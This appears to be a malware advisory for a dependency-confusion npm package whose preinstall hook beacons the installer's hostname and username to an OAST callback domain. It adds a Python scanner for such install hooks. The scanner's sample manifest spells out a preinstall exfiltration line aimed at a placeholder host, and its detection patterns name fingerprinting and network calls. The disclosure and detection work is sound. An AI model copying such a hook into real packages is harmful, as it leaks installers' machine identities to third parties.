
MAL-2026-5522

Malicious code in @orion-design-system/components (npm)

Details


## Source: amazon-inspector (edd5d007da2de0a07fc1a0d999cccbf71a748627c82c9b2000d161eb248a5a0f)

package.json declares a `preinstall` hook that runs an inline `node -e` script reading `os.hostname()` and `os.userInfo().username` and transmitting them via HTTPS GET (and a DNS lookup) to `d8kn5vlt5p5h1j34mbcgbx1nffwjobfoh.oast.fun`, an interactsh/OAST callback subdomain not controlled by the installer. The hook fires automatically on `npm install`, with no opt-out.

The package is published under the `@orion-design-system` scope at version `9999.0.0` (the canonical dependency-confusion bait version), and the README names Cloud Imperium Games / Roberts Space Industries as the intended target, confirming the package is positioned to be resolved over a private internal package of the same name. Any installer whose resolver picks the public version (intentionally or via misconfiguration) leaks host identifiers to a third-party collection endpoint on install.

The `9999.0.0` version pin combined with the scope-targeted README and unconditional install-time beacon places this firmly in the active-attack / dependency-confusion-exfil pattern, regardless of any `research` framing.
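The indicators above (an automatic install hook, inline `node -e` execution, host/user fingerprinting calls, outbound network modules, and the `9999.x.x` bait version) are all visible statically in `package.json`, so they can be checked before `npm install` ever runs a script. The following is an added example of such a pre-install check; it is not tooling from this advisory or from Amazon Inspector. The manifest it scans is constructed for illustration: the scope name `@example-scope`, the callback host `callback.example.invalid`, and the hook body are placeholders modelled on the pattern described above, not the real package contents.

```python
"""Static pre-install check of an npm package.json for install-time hooks that
match the dependency-confusion beacon pattern. Added example; the sample
manifest below is constructed, not taken from the real package."""
import json
import re

# Lifecycle scripts npm runs automatically during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Indicators drawn from the advisory's description of the hook.
INDICATORS = {
    "inline_node_eval": re.compile(r"\bnode\s+(-e|--eval)\b"),
    "host_fingerprint": re.compile(r"os\.(hostname|userInfo)\s*\("),
    "network_call": re.compile(r"require\(\s*['\"](https?|dns|net)['\"]\s*\)"),
    # Any 9999.x.x version is the classic "win the resolver" bait.
    "bait_version": re.compile(r"^9999\.\d+\.\d+$"),
}

# Constructed sample manifest (placeholder scope, placeholder .invalid host).
SAMPLE_MANIFEST = json.loads(r'''
{
  "name": "@example-scope/components",
  "version": "9999.0.0",
  "scripts": {
    "preinstall": "node -e \"const os=require('os');require('https').get('https://callback.example.invalid/?h='+encodeURIComponent(os.hostname()))\"",
    "build": "tsc -p ."
  }
}
''')


def analyze_manifest(manifest: dict) -> dict:
    """Report which install hooks exist and which indicators each one hits."""
    findings = {"hooks": {}, "bait_version": False}
    version = str(manifest.get("version", ""))
    findings["bait_version"] = bool(INDICATORS["bait_version"].match(version))
    scripts = manifest.get("scripts") or {}
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        hits = [name for name in ("inline_node_eval", "host_fingerprint", "network_call")
                if INDICATORS[name].search(cmd)]
        findings["hooks"][hook] = hits
    return findings


def risk_level(findings: dict) -> str:
    """Collapse findings into low / medium / high.

    high:   inline eval combined with fingerprinting or network use in an
            install hook, or any install hook on a 9999.x.x bait version
    medium: an install hook exists (needs human review, may be legitimate)
    low:    no install-time hooks at all
    """
    for hits in findings["hooks"].values():
        if "inline_node_eval" in hits and {"host_fingerprint", "network_call"} & set(hits):
            return "high"
    if findings["hooks"] and findings["bait_version"]:
        return "high"
    if findings["hooks"]:
        return "medium"
    return "low"


def analyze_file(path: str) -> dict:
    """Convenience wrapper for scanning an on-disk package.json."""
    with open(path, encoding="utf-8") as fh:
        return analyze_manifest(json.load(fh))


if __name__ == "__main__":
    result = analyze_manifest(SAMPLE_MANIFEST)
    print(json.dumps(result, indent=2))
    print("risk:", risk_level(result))
```

Run this over the extracted tarball of any package before letting it execute scripts (for example in a registry proxy or a CI gate). The check is a heuristic, not a substitute for the structural fixes against dependency confusion: map each private scope to your internal registry in `.npmrc` (`@your-scope:registry=https://your-internal-registry/`) so the public registry is never consulted for it, and set `ignore-scripts=true` where install hooks are not needed.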


Affected packages

npm / @orion-design-system/components

No fixed version published yet for @orion-design-system/components (npm). Pin to a known-safe version or switch to an alternative.
